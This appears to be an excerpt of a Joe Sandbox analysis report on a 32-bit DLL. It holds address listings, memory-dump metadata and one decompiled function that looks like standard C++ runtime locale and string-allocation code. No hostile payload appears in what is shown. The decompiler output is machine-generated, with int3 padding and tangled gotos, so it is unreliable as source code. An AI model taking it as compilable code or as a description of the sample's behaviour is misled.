              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da8caa6
              0x6da8caa6
              0x6da8caaa
              0x6da8cabc
              0x6da8cabf
              0x6da8cac2
              0x6da8cac4
              0x6da8cadb
              0x6da8cadf
              0x6da8cae5
              0x6da8cae6
              0x6da8cae8
              0x00000000
              0x6da8caea
              0x00000000
              0x6da8caea
              0x6da8cac6
              0x6da8cacb
              0x6da8cace
              0x6da8cad3
              0x6da8cad6
              0x00000000
              0x6da8cad6
              0x6da8caac
              0x6da8caaf
              0x6da8cab2
              0x6da8cab4
              0x00000000
              0x6da8cab6
              0x6da8cab6
              0x6da8caba
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da8caba
              0x6da8cab4
              0x6da8caaa
              0x6da8c954
              0x6da8c954
              0x6da8c95b
              0x00000000
              0x6da8c95d
              0x6da8c95d
              0x6da8c964
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da8c964
              0x6da8c95b
              0x6da8c952
              0x6da8c945
              0x6da8c8c5
              0x6da8c8cd
              0x6da8c8d0
              0x6da8c8d5
              0x6da8c8d9
              0x6da8c8dc
              0x6da8c8e2
              0x6da8c8e5
              0x00000000
              0x6da8c8e7
              0x6da8c8e7
              0x6da8c8ea
              0x6da8c8ec
              0x6da8cb22
              0x6da8cb22
              0x00000000
              0x6da8c8f2
              0x6da8c8fa
              0x6da8c905
              0x00000000
              0x00000000
              0x6da8c90e
              0x6da8c911
              0x6da8c912
              0x6da8c915
              0x6da8c917
              0x00000000
              0x6da8c91d
              0x00000000
              0x6da8c91d
              0x00000000
              0x6da8c917
              0x6da8c8f2
              0x6da8cb27
              0x6da8cb27
              0x6da8cb29
              0x6da8cb2a
              0x6da8cb31
              0x6da8cb34
              0x6da8cb42
              0x6da8cb47
              0x6da8cb4c
              0x6da8cb4f
              0x6da8cb54
              0x6da8cb57
              0x6da8cb5a
              0x6da8cb5c
              0x6da8cb5e
              0x6da8cb5e
              0x6da8cb63
              0x6da8cb6f
              0x6da8cb75
              0x6da8cb7a
              0x6da8cb7d
              0x6da8cb7e
              0x00000000
              0x6da8cb7e
              0x6da8c8e5
              0x6da8c8c3
              0x6da8c883
              0x6da8c864
              0x6da8c856
              0x6da8c822

              APIs
              • IsInExceptionSpec.LIBVCRUNTIME ref: 6DA8C8DC
              • type_info::operator==.LIBVCRUNTIME ref: 6DA8C8FE
              • ___TypeMatch.LIBVCRUNTIME ref: 6DA8CA0D
              • IsInExceptionSpec.LIBVCRUNTIME ref: 6DA8CADF
              • _UnwindNestedFrames.LIBCMT ref: 6DA8CB63
              • CallUnexpected.LIBVCRUNTIME ref: 6DA8CB7E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
              • String ID: csm$csm$csm
              • API String ID: 2123188842-393685449
              • Opcode ID: 327ced46414c436831ab86afeb4d1cebe9738f67bdf3bc3f2b03a6eebb77e596
              • Instruction ID: 0183c17aa24aa56d85d254d74020624a9defea339edbd584e15f28c9fa3a3b65
              • Opcode Fuzzy Hash: 327ced46414c436831ab86afeb4d1cebe9738f67bdf3bc3f2b03a6eebb77e596
              • Instruction Fuzzy Hash: 9BB16875C0820AEFCF05CFA4D9849AEBBB6FF08314B15465AED116B216D730DAA1CF91
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 59%
              			E6DA85A50(void* __ebx, void* __edx, void* __edi, void* __esi) {
              				intOrPtr _v4;
              				signed int _v8;
              				signed int _v12;
              				signed int _v16;
              				signed int _v20;
              				unsigned int _v24;
              				unsigned int _v28;
              				signed int _v32;
              				signed int _v36;
              				signed int _v40;
              				char _v44;
              				char _v48;
              				signed int _v52;
              				short _v56;
              				char _v60;
              				short _v64;
              				char _v68;
              				char _v72;
              				char _v76;
              				char _v80;
              				char _v84;
              				char _v88;
              				char _v92;
              				char _v96;
              				char _v100;
              				char _v104;
              				char _v108;
              				char _v112;
              				char _v132;
              				char _v148;
              				intOrPtr _v220;
              				signed int _v232;
              				char _v240;
              				signed int _v244;
              				signed int _v256;
              				signed int _v260;
              				signed int _v272;
              				intOrPtr _v280;
              				signed int _v292;
              				signed int _t218;
              				signed int _t221;
              				signed int _t224;
              				signed int _t234;
              				void* _t243;
              				void* _t259;
              				signed int _t262;
              				unsigned int _t264;
              				void* _t265;
              				signed int _t280;
              				signed int _t282;
              				signed int _t283;
              				unsigned int _t285;
              				void* _t286;
              				signed int _t289;
              				signed int _t304;
              				signed int _t306;
              				signed int _t307;
              				unsigned int _t309;
              				void* _t310;
              				signed int _t324;
              				signed int _t326;
              				void* _t329;
              				signed int _t334;
              				signed int _t335;
              				void* _t342;
              				signed int _t347;
              				signed int _t348;
              				void* _t357;
              				signed int _t362;
              				signed int _t363;
              				void* _t365;
              				signed int _t367;
              				signed int _t369;
              				signed int* _t371;
              				signed int* _t372;
              				signed int* _t373;
              				intOrPtr _t382;
              				signed int _t388;
              				signed int* _t394;
              				signed int _t400;
              				void* _t402;
              				void* _t409;
              				void* _t411;
              				signed int _t424;
              				signed int _t425;
              				signed int _t426;
              				signed int _t429;
              				signed int _t431;
              				signed int _t432;
              				signed int _t434;
              				signed int _t435;
              				unsigned int _t437;
              				signed int _t438;
              				signed int _t449;
              				signed int _t451;
              				signed int _t453;
              				signed int _t455;
              				signed int _t456;
              				intOrPtr _t457;
              				signed int _t459;
              				unsigned int _t460;
              				signed int _t461;
              				signed int _t463;
              				signed int _t467;
              				signed int _t468;
              				signed int _t470;
              				signed int _t473;
              				signed int _t474;
              				signed int _t476;
              				unsigned int _t480;
              				unsigned int _t482;
              				unsigned int _t484;
              				void* _t486;
              				void* _t487;
              				void* _t495;
              				unsigned int _t498;
              				void* _t499;
              				unsigned int _t502;
              				void* _t503;
              				unsigned int _t505;
              				void* _t506;
              				void* _t508;
              				void* _t509;
              				void* _t510;
              				void* _t511;
              				void* _t531;
              
              				_push(__ebx);
              				_t365 = _t495;
              				_t498 = (_t495 - 0x00000008 & 0xfffffff8) + 4;
              				_v8 =  *((intOrPtr*)(_t365 + 4));
              				_t480 = _t498;
              				_push(0xffffffff);
              				_push(E6DAA25EC);
              				_push( *[fs:0x0]);
              				 *[fs:0x0] = _t498;
              				_push(_t365);
              				_t499 = _t498 - 0x58;
              				_push(__esi);
              				_push(__edi);
              				E6DA888D6( &_v40, 0);
              				_v16 = 0;
              				_t429 =  *0x6dad5060; // 0x0
              				_t218 =  *0x6dad5c80; // 0x0
              				_v36 = _t218;
              				if(_t429 == 0) {
              					E6DA888D6( &_v32, _t429);
              					_t531 =  *0x6dad5060 - _t429; // 0x0
              					if(_t531 == 0) {
              						_t362 =  *0x6dad5048; // 0x0
              						_t363 = _t362 + 1;
              						 *0x6dad5048 = _t363;
              						 *0x6dad5060 = _t363;
              					}
              					E6DA8892E( &_v32);
              					_t429 =  *0x6dad5060; // 0x0
              				}
              				_t9 =  *((intOrPtr*)(_t365 + 8)) + 4; // 0x6a108bc8
              				_t382 =  *_t9;
              				if(_t429 >=  *((intOrPtr*)(_t382 + 0xc))) {
              					_t449 = 0;
              					__eflags = 0;
              					goto L8;
              				} else {
              					_t449 =  *( *((intOrPtr*)(_t382 + 8)) + _t429 * 4);
              					if(_t449 == 0) {
              						L8:
              						__eflags =  *((char*)(_t382 + 0x14));
              						if( *((char*)(_t382 + 0x14)) == 0) {
              							L11:
              							__eflags = _t449;
              							if(_t449 != 0) {
              								goto L6;
              							} else {
              								goto L12;
              							}
              						} else {
              							_t357 = E6DA88AB3();
              							__eflags = _t429 -  *((intOrPtr*)(_t357 + 0xc));
              							if(_t429 >=  *((intOrPtr*)(_t357 + 0xc))) {
              								L12:
              								_t221 = _v36;
              								__eflags = _t221;
              								if(__eflags == 0) {
              									_t449 = E6DA89399(_t429, _t449, __eflags, 0x18);
              									_t502 = _t499 + 4;
              									_v36 = _t449;
              									_t24 =  *((intOrPtr*)(_t365 + 8)) + 4; // 0x6a108bc8
              									_t224 =  *_t24;
              									__eflags = _t224;
              									if(_t224 == 0) {
              										_t431 = 0x6daaf2c7;
              									} else {
              										_t431 =  *(_t224 + 0x18);
              										__eflags = _t431;
              										if(_t431 == 0) {
              											_t26 = _t224 + 0x1c; // 0x6a108be4
              											_t431 = _t26;
              										}
              									}
              									E6DA888D6( &_v112, 0);
              									_v108 = 0;
              									_v104 = 0;
              									_v100 = 0;
              									_v96 = 0;
              									_v92 = 0;
              									_v88 = 0;
              									_v84 = 0;
              									_v80 = 0;
              									_v76 = 0;
              									_v72 = 0;
              									_v68 = 0;
              									_v64 = 0;
              									_v16 = 8;
              									__eflags = _t431;
              									if(_t431 == 0) {
              										E6DA88889("bad locale name");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										_push(_t480);
              										_t482 = _t502;
              										_push(0xffffffff);
              										_push(E6DAA265C);
              										_push( *[fs:0x0]);
              										 *[fs:0x0] = _t502;
              										_t503 = _t502 - 0x3c;
              										_push(_t365);
              										_push(_t449);
              										_push(_t431);
              										E6DA888D6( &_v148, 0);
              										_v132 = 0;
              										_t432 =  *0x6dad5cb4; // 0x0
              										_t367 =  *0x6dad5c7c; // 0x0
              										__eflags = _t432;
              										if(_t432 == 0) {
              											E6DA888D6( &_v32, _t432);
              											__eflags =  *0x6dad5cb4 - _t432; // 0x0
              											if(__eflags == 0) {
              												_t347 =  *0x6dad5048; // 0x0
              												_t348 = _t347 + 1;
              												__eflags = _t348;
              												 *0x6dad5048 = _t348;
              												 *0x6dad5cb4 = _t348;
              											}
              											E6DA8892E( &_v32);
              											_t432 =  *0x6dad5cb4; // 0x0
              										}
              										_t388 =  *(_v8 + 4);
              										__eflags = _t432 -  *((intOrPtr*)(_t388 + 0xc));
              										if(_t432 >=  *((intOrPtr*)(_t388 + 0xc))) {
              											_t451 = 0;
              											__eflags = 0;
              											goto L29;
              										} else {
              											_t451 =  *( *((intOrPtr*)(_t388 + 8)) + _t432 * 4);
              											__eflags = _t451;
              											if(_t451 == 0) {
              												L29:
              												__eflags =  *((char*)(_t388 + 0x14));
              												if( *((char*)(_t388 + 0x14)) == 0) {
              													L32:
              													__eflags = _t451;
              													if(_t451 != 0) {
              														goto L27;
              													} else {
              														goto L33;
              													}
              												} else {
              													_t342 = E6DA88AB3();
              													__eflags = _t432 -  *((intOrPtr*)(_t342 + 0xc));
              													if(_t432 >=  *((intOrPtr*)(_t342 + 0xc))) {
              														L33:
              														__eflags = _t367;
              														if(__eflags == 0) {
              															_t451 = E6DA89399(_t432, _t451, __eflags, 8);
              															_t505 = _t503 + 4;
              															_v32 = _t451;
              															_t234 =  *(_v8 + 4);
              															__eflags = _t234;
              															if(_t234 == 0) {
              																_t434 = 0x6daaf2c7;
              															} else {
              																_t434 =  *(_t234 + 0x18);
              																__eflags = _t434;
              																if(_t434 == 0) {
              																	_t434 = _t234 + 0x1c;
              																}
              															}
              															E6DA888D6( &_v88, 0);
              															_v84 = 0;
              															_v80 = 0;
              															_v76 = 0;
              															_v72 = 0;
              															_v68 = 0;
              															_v64 = 0;
              															_v60 = 0;
              															_v56 = 0;
              															_v52 = 0;
              															_v48 = 0;
              															_v44 = 0;
              															_v40 = 0;
              															_v20 = 8;
              															__eflags = _t434;
              															if(_t434 == 0) {
              																E6DA88889("bad locale name");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																_push(_t482);
              																_t484 = _t505;
              																_push(0xffffffff);
              																_push(E6DAA2685);
              																_push( *[fs:0x0]);
              																 *[fs:0x0] = _t505;
              																_t506 = _t505 - 0xc;
              																_push(_t367);
              																_push(_t451);
              																_push(_t434);
              																E6DA888D6( &_v240, 0);
              																_v220 = 0;
              																_t435 =  *0x6dad5cb8; // 0x0
              																_t369 =  *0x6dad5c78; // 0x0
              																_v232 = _t369;
              																__eflags = _t435;
              																if(_t435 == 0) {
              																	E6DA888D6( &_v40, _t435);
              																	__eflags =  *0x6dad5cb8 - _t435; // 0x0
              																	if(__eflags == 0) {
              																		_t334 =  *0x6dad5048; // 0x0
              																		_t335 = _t334 + 1;
              																		__eflags = _t335;
              																		 *0x6dad5048 = _t335;
              																		 *0x6dad5cb8 = _t335;
              																	}
              																	E6DA8892E( &_v40);
              																	_t435 =  *0x6dad5cb8; // 0x0
              																}
              																_t394 =  *(_v12 + 4);
              																__eflags = _t435 - _t394[3];
              																if(_t435 >= _t394[3]) {
              																	_t453 = 0;
              																	__eflags = 0;
              																	goto L50;
              																} else {
              																	_t453 =  *(_t394[2] + _t435 * 4);
              																	__eflags = _t453;
              																	if(_t453 != 0) {
              																		L58:
              																		E6DA8892E( &_v44);
              																		 *[fs:0x0] = _v32;
              																		return _t453;
              																	} else {
              																		L50:
              																		__eflags = _t394[5];
              																		if(_t394[5] == 0) {
              																			L53:
              																			__eflags = _t453;
              																			if(_t453 != 0) {
              																				goto L58;
              																			} else {
              																				goto L54;
              																			}
              																		} else {
              																			_t329 = E6DA88AB3();
              																			__eflags = _t435 -  *((intOrPtr*)(_t329 + 0xc));
              																			if(_t435 >=  *((intOrPtr*)(_t329 + 0xc))) {
              																				L54:
              																				__eflags = _t369;
              																				if(_t369 == 0) {
              																					_t243 = E6DA862F0(_t369, _t435,  &_v36, _v12);
              																					_t508 = _t506 + 8;
              																					__eflags = _t243 - 0xffffffff;
              																					if(__eflags == 0) {
              																						E6DA82950();
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						_push(_t484);
              																						_t486 = _t508;
              																						_t509 = _t508 - 8;
              																						_push(_t369);
              																						_t371 = _t394;
              																						_t397 = 0x7fffffff;
              																						_push(_t453);
              																						_t455 = _v244;
              																						_t424 = _t371[4];
              																						_v256 = _t424;
              																						_push(_t435);
              																						__eflags = 0x7fffffff - _t424 - _t455;
              																						if(__eflags < 0) {
              																							E6DA814C0(_t371, 0x7fffffff, _t424, __eflags);
              																							goto L81;
              																						} else {
              																							_t435 = _t371[5];
              																							_t307 = _t424 + _t455;
              																							_v32 = _t307;
              																							_t473 = _t307 | 0x0000000f;
              																							_v16 = _t435;
              																							__eflags = _t473 - 0x7fffffff;
              																							if(__eflags <= 0) {
              																								_t309 = _t435 >> 1;
              																								_t397 = 0x7fffffff - _t309;
              																								__eflags = _t435 - _t397;
              																								if(__eflags <= 0) {
              																									_t310 = _t309 + _t435;
              																									__eflags = _t473 - _t310;
              																									_t455 =  <  ? _t310 : _t473;
              																									_t124 = _t455 + 1; // 0x80000000
              																									_t397 = _t124;
              																									__eflags = _t397 - 0x1000;
              																									if(_t397 < 0x1000) {
              																										__eflags = _t397;
              																										if(__eflags == 0) {
              																											_t435 = 0;
              																											__eflags = 0;
              																										} else {
              																											_t324 = E6DA89399(_t435, _t455, __eflags, _t397);
              																											_t424 = _v28;
              																											_t509 = _t509 + 4;
              																											_t435 = _t324;
              																										}
              																										goto L74;
              																									} else {
              																										_t125 =  &(_t397[8]); // 0x80000023
              																										_t325 = _t125;
              																										__eflags = _t125 - _t397;
              																										if(__eflags <= 0) {
              																											L81:
              																											E6DA81420();
              																											goto L82;
              																										} else {
              																											goto L64;
              																										}
              																									}
              																								} else {
              																									_t455 = 0x7fffffff;
              																									goto L63;
              																								}
              																							} else {
              																								_t455 = 0x7fffffff;
              																								L63:
              																								_t325 = 0x80000023;
              																								L64:
              																								_t326 = E6DA89399(_t435, _t455, __eflags, _t325);
              																								_t509 = _t509 + 4;
              																								__eflags = _t326;
              																								if(_t326 == 0) {
              																									L82:
              																									E6DA8DACF(_t371, _t397, _t424);
              																									asm("int3");
              																									asm("int3");
              																									asm("int3");
              																									asm("int3");
              																									asm("int3");
              																									asm("int3");
              																									asm("int3");
              																									asm("int3");
              																									asm("int3");
              																									asm("int3");
              																									asm("int3");
              																									asm("int3");
              																									asm("int3");
              																									asm("int3");
              																									asm("int3");
              																									_push(_t486);
              																									_t487 = _t509;
              																									_t510 = _t509 - 0xc;
              																									_t425 = _v260;
              																									_push(_t371);
              																									_t372 = _t397;
              																									_t398 = 0x7fffffff;
              																									_push(_t455);
              																									_push(_t435);
              																									_t456 = _t372[4];
              																									_v272 = _t456;
              																									__eflags = 0x7fffffff - _t456 - _t425;
              																									if(__eflags < 0) {
              																										E6DA814C0(_t372, 0x7fffffff, _t425, __eflags);
              																										goto L104;
              																									} else {
              																										_t435 = _t372[5];
              																										_t283 = _t456 + _t425;
              																										_v36 = _t283;
              																										_t467 = _t283 | 0x0000000f;
              																										_v20 = _t435;
              																										__eflags = _t467 - 0x7fffffff;
              																										if(__eflags <= 0) {
              																											_t285 = _t435 >> 1;
              																											_t398 = 0x7fffffff - _t285;
              																											__eflags = _t435 - _t398;
              																											if(__eflags <= 0) {
              																												_t286 = _t285 + _t435;
              																												__eflags = _t467 - _t286;
              																												_t456 =  <  ? _t286 : _t467;
              																												_t154 = _t456 + 1; // 0x80000000
              																												_t398 = _t154;
              																												__eflags = _t398 - 0x1000;
              																												if(_t398 < 0x1000) {
              																													__eflags = _t398;
              																													if(__eflags == 0) {
              																														_t435 = 0;
              																														__eflags = 0;
              																													} else {
              																														_t304 = E6DA89399(_t435, _t456, __eflags, _t398);
              																														_t510 = _t510 + 4;
              																														_t435 = _t304;
              																													}
              																													goto L97;
              																												} else {
              																													_t155 = _t398 + 0x23; // 0x80000023
              																													_t305 = _t155;
              																													__eflags = _t155 - _t398;
              																													if(__eflags <= 0) {
              																														L104:
              																														E6DA81420();
              																														goto L105;
              																													} else {
              																														goto L87;
              																													}
              																												}
              																											} else {
              																												_t456 = 0x7fffffff;
              																												goto L86;
              																											}
              																										} else {
              																											_t456 = 0x7fffffff;
              																											L86:
              																											_t305 = 0x80000023;
              																											L87:
              																											_t306 = E6DA89399(_t435, _t456, __eflags, _t305);
              																											_t510 = _t510 + 4;
              																											__eflags = _t306;
              																											if(_t306 == 0) {
              																												L105:
              																												E6DA8DACF(_t372, _t398, _t425);
              																												asm("int3");
              																												asm("int3");
              																												asm("int3");
              																												asm("int3");
              																												asm("int3");
              																												asm("int3");
              																												asm("int3");
              																												asm("int3");
              																												asm("int3");
              																												asm("int3");
              																												asm("int3");
              																												asm("int3");
              																												_push(_t487);
              																												_t511 = _t510 - 8;
              																												_push(_t372);
              																												_t373 = _t398;
              																												_t399 = 0x7fffffff;
              																												_push(_t456);
              																												_t457 = _v280;
              																												_t426 = _t373[4];
              																												_v292 = _t426;
              																												_push(_t435);
              																												__eflags = 0x7fffffff - _t426 - _t457;
              																												if(__eflags < 0) {
              																													E6DA814C0(_t373, 0x7fffffff, _t426, __eflags);
              																													goto L127;
              																												} else {
              																													_t437 = _t373[5];
              																													_t262 = _t426 + _t457;
              																													_v40 = _t262;
              																													_t459 = _t262 | 0x0000000f;
              																													_v24 = _t437;
              																													__eflags = _t459 - 0x7fffffff;
              																													if(__eflags <= 0) {
              																														_t264 = _t437 >> 1;
              																														_t399 = 0x7fffffff - _t264;
              																														__eflags = _t437 - _t399;
              																														if(__eflags <= 0) {
              																															_t265 = _t264 + _t437;
              																															__eflags = _t459 - _t265;
              																															_t460 =  <  ? _t265 : _t459;
              																															_t193 = _t460 + 1; // 0x80000000
              																															_t399 = _t193;
              																															__eflags = _t399 - 0x1000;
              																															if(_t399 < 0x1000) {
              																																__eflags = _t399;
              																																if(__eflags == 0) {
              																																	_t438 = 0;
              																																	__eflags = 0;
              																																} else {
              																																	_t280 = E6DA89399(_t437, _t460, __eflags, _t399);
              																																	_t426 = _v36;
              																																	_t511 = _t511 + 4;
              																																	_t438 = _t280;
              																																}
              																																goto L120;
              																															} else {
              																																_t194 = _t399 + 0x23; // 0x80000023
              																																_t281 = _t194;
              																																__eflags = _t194 - _t399;
              																																if(__eflags <= 0) {
              																																	L127:
              																																	E6DA81420();
              																																	goto L128;
              																																} else {
              																																	goto L110;
              																																}
              																															}
              																														} else {
              																															_t460 = 0x7fffffff;
              																															goto L109;
              																														}
              																													} else {
              																														_t460 = 0x7fffffff;
              																														L109:
              																														_t281 = 0x80000023;
              																														L110:
              																														_t282 = E6DA89399(_t437, _t460, __eflags, _t281);
              																														_t511 = _t511 + 4;
              																														__eflags = _t282;
              																														if(_t282 == 0) {
              																															L128:
              																															_t259 = E6DA8DACF(_t373, _t399, _t426);
              																															asm("int3");
              																															asm("int3");
              																															asm("int3");
              																															asm("int3");
              																															asm("int3");
              																															asm("int3");
              																															asm("int3");
              																															asm("int3");
              																															_t400 =  *_t399;
              																															__eflags = _t400;
              																															if(_t400 != 0) {
              																																return  *((intOrPtr*)( *_t400))(1);
              																															}
              																															return _t259;
              																														} else {
              																															_t426 = _v36;
              																															_t191 = _t282 + 0x23; // 0x23
              																															_t438 = _t191 & 0xffffffe0;
              																															 *(_t438 - 4) = _t282;
              																															L120:
              																															_t373[4] = _v40;
              																															_t373[5] = _t460;
              																															_t461 = _t438 + _t426;
              																															_v40 = _t461;
              																															__eflags = _v24 - 0x10;
              																															_v36 = _v16 + _t461;
              																															_push(_t426);
              																															if(_v24 < 0x10) {
              																																_push(_t373);
              																																_push(_t438);
              																																E6DA8AB10();
              																																E6DA8B0A0(_t438, _t461, _v12, _v16);
              																																 *_v36 = 0;
              																																 *_t373 = _t438;
              																																return _t373;
              																															} else {
              																																_t463 =  *_t373;
              																																_push(_t463);
              																																_push(_t438);
              																																E6DA8AB10();
              																																E6DA8B0A0(_t438, _v40, _v12, _v16);
              																																_t402 = _v24 + 1;
              																																 *_v36 = 0;
              																																__eflags = _t402 - 0x1000;
              																																if(_t402 < 0x1000) {
              																																	L124:
              																																	_push(_t402);
              																																	E6DA893C9(_t463);
              																																	 *_t373 = _t438;
              																																	return _t373;
              																																} else {
              																																	_t426 =  *(_t463 - 4);
              																																	_t399 = _t402 + 0x23;
              																																	_t212 = _t463 - _t426 - 4; // 0x7ffffffb
              																																	__eflags = _t212 - 0x1f;
              																																	if(_t212 > 0x1f) {
              																																		goto L128;
              																																	} else {
              																																		_t463 = _t426;
              																																		goto L124;
              																																	}
              																																}
              																															}
              																														}
              																													}
              																												}
              																											} else {
              																												_t152 = _t306 + 0x23; // 0x23
              																												_t435 = _t152 & 0xffffffe0;
              																												 *(_t435 - 4) = _t306;
              																												L97:
              																												_t372[4] = _v36;
              																												_t289 = _v12;
              																												_t372[5] = _t456;
              																												_v32 = _v32 - _t289 + 1;
              																												_t468 = _t435 + _t289;
              																												_v40 = _t468;
              																												__eflags = _v20 - 0x10;
              																												_v36 = _v8 + _t468;
              																												_push(_t289);
              																												if(_v20 < 0x10) {
              																													_push(_t372);
              																													_push(_t435);
              																													E6DA8AB10();
              																													E6DA8B0A0(_t435, _t468, _v4, _v8);
              																													__eflags = _t372 + _v12;
              																													E6DA8AB10(_v36, _t372 + _v12, _v32);
              																													 *_t372 = _t435;
              																													return _t372;
              																												} else {
              																													_t470 =  *_t372;
              																													_push(_t470);
              																													_push(_t435);
              																													E6DA8AB10();
              																													E6DA8B0A0(_t435, _v40, _v4, _v8);
              																													E6DA8AB10(_v36, _v12 + _t470, _v32);
              																													_t510 = _t510 + 0x24;
              																													_t409 = _v20 + 1;
              																													__eflags = _t409 - 0x1000;
              																													if(_t409 < 0x1000) {
              																														L101:
              																														_push(_t409);
              																														E6DA893C9(_t470);
              																														 *_t372 = _t435;
              																														return _t372;
              																													} else {
              																														_t425 =  *(_t470 - 4);
              																														_t398 = _t409 + 0x23;
              																														_t456 = _t470 - _t425;
              																														_t177 = _t456 - 4; // 0x7ffffffb
              																														__eflags = _t177 - 0x1f;
              																														if(_t177 > 0x1f) {
              																															goto L105;
              																														} else {
              																															_t470 = _t425;
              																															goto L101;
              																														}
              																													}
              																												}
              																											}
              																										}
              																									}
              																								} else {
              																									_t424 = _v28;
              																									_t122 = _t326 + 0x23; // 0x23
              																									_t435 = _t122 & 0xffffffe0;
              																									 *(_t435 - 4) = _t326;
              																									L74:
              																									_t371[4] = _v32;
              																									_t371[5] = _t455;
              																									_t474 = _t435 + _t424;
              																									_v32 = _t474;
              																									__eflags = _v16 - 0x10;
              																									_v28 = _v4 + _t474;
              																									_push(_t424);
              																									if(_v16 < 0x10) {
              																										_push(_t371);
              																										_push(_t435);
              																										E6DA8AB10();
              																										E6DA8AB10(_t474, _v8, _v4);
              																										 *_v28 = 0;
              																										 *_t371 = _t435;
              																										return _t371;
              																									} else {
              																										_t476 =  *_t371;
              																										_push(_t476);
              																										_push(_t435);
              																										E6DA8AB10();
              																										E6DA8AB10(_v32, _v8, _v4);
              																										_t509 = _t509 + 0x18;
              																										_t411 = _v16 + 1;
              																										 *_v28 = 0;
              																										__eflags = _t411 - 0x1000;
              																										if(_t411 < 0x1000) {
              																											L78:
              																											_push(_t411);
              																											E6DA893C9(_t476);
              																											 *_t371 = _t435;
              																											return _t371;
              																										} else {
              																											_t424 =  *(_t476 - 4);
              																											_t397 = _t411 + 0x23;
              																											_t455 = _t476 - _t424;
              																											_t141 = _t455 - 4; // 0x7ffffffb
              																											__eflags = _t141 - 0x1f;
              																											if(_t141 > 0x1f) {
              																												goto L82;
              																											} else {
              																												_t476 = _t424;
              																												goto L78;
              																											}
              																										}
              																									}
              																								}
              																							}
              																						}
              																					} else {
              																						_t453 = _v36;
              																						_v12 = _t453;
              																						_v24 = 1;
              																						E6DA88A87(__eflags, _t453);
              																						 *((intOrPtr*)( *_t453 + 4))();
              																						 *0x6dad5c78 = _t453;
              																						goto L58;
              																					}
              																				} else {
              																					_t453 = _t369;
              																					goto L58;
              																				}
              																			} else {
              																				_t453 =  *( *((intOrPtr*)(_t329 + 8)) + _t435 * 4);
              																				goto L53;
              																			}
              																		}
              																	}
              																}
              															} else {
              																E6DA88BB9( &_v88,  &_v88, _t434);
              																 *((intOrPtr*)(_t451 + 4)) = 0;
              																 *_t451 = 0x6daa4e00;
              																E6DA829E0( &_v88);
              																_v8 = _t451;
              																_v20 = 9;
              																E6DA88A87(__eflags, _t451);
              																 *((intOrPtr*)( *_t451 + 4))();
              																 *0x6dad5c7c = _t451;
              																goto L27;
              															}
              														} else {
              															_t451 = _t367;
              															goto L27;
              														}
              													} else {
              														_t451 =  *( *((intOrPtr*)(_t342 + 8)) + _t432 * 4);
              														goto L32;
              													}
              												}
              											} else {
              												L27:
              												E6DA8892E( &_v36);
              												 *[fs:0x0] = _v28;
              												return _t451;
              											}
              										}
              									} else {
              										E6DA88BB9( &_v112,  &_v112, _t431);
              										 *((intOrPtr*)(_t449 + 4)) = 0;
              										 *_t449 = 0x6daa4dd0;
              										E6DA88DE6(_t431, _t449, __eflags,  &_v60);
              										asm("movups xmm0, [eax]");
              										asm("movups [esi+0x8], xmm0");
              										E6DA829E0( &_v112);
              										_v36 = _t449;
              										_v16 = 9;
              										E6DA88A87(__eflags, _t449);
              										 *((intOrPtr*)( *_t449 + 4))();
              										 *0x6dad5c80 = _t449;
              										goto L6;
              									}
              								} else {
              									_t449 = _t221;
              									goto L6;
              								}
              							} else {
              								_t449 =  *( *((intOrPtr*)(_t357 + 8)) + _t429 * 4);
              								goto L11;
              							}
              						}
              					} else {
              						L6:
              						E6DA8892E( &_v40);
              						 *[fs:0x0] = _v24;
              						return _t449;
              					}
              				}
              			}
              0x6da861e2
              0x6da861e4
              0x6da861e6
              0x6da861e8
              0x6da861f1
              0x6da861f3
              0x6da861f5
              0x6da861f8
              0x6da861f8
              0x6da861fb
              0x6da86201
              0x6da86210
              0x6da86212
              0x6da86224
              0x6da86224
              0x6da86214
              0x6da86215
              0x6da8621a
              0x6da8621d
              0x6da86220
              0x6da86220
              0x00000000
              0x6da86203
              0x6da86203
              0x6da86203
              0x6da86206
              0x6da86208
              0x6da862ce
              0x6da862ce
              0x00000000
              0x6da8620e
              0x00000000
              0x6da8620e
              0x6da86208
              0x6da861ea
              0x6da861ea
              0x00000000
              0x6da861ea
              0x6da861ba
              0x6da861ba
              0x6da861bc
              0x6da861bc
              0x6da861c1
              0x6da861c2
              0x6da861c7
              0x6da861ca
              0x6da861cc
              0x6da862d3
              0x6da862d3
              0x6da862d8
              0x6da862d9
              0x6da862da
              0x6da862db
              0x6da862dc
              0x6da862dd
              0x6da862de
              0x6da862df
              0x6da862e0
              0x6da862e2
              0x6da862e4
              0x00000000
              0x6da862ea
              0x6da862ec
              0x6da861d2
              0x6da861d2
              0x6da861d5
              0x6da861d8
              0x6da861db
              0x6da86226
              0x6da86229
              0x6da86236
              0x6da86239
              0x6da8623e
              0x6da86241
              0x6da86245
              0x6da86248
              0x6da86249
              0x6da862a0
              0x6da862a1
              0x6da862a2
              0x6da862ae
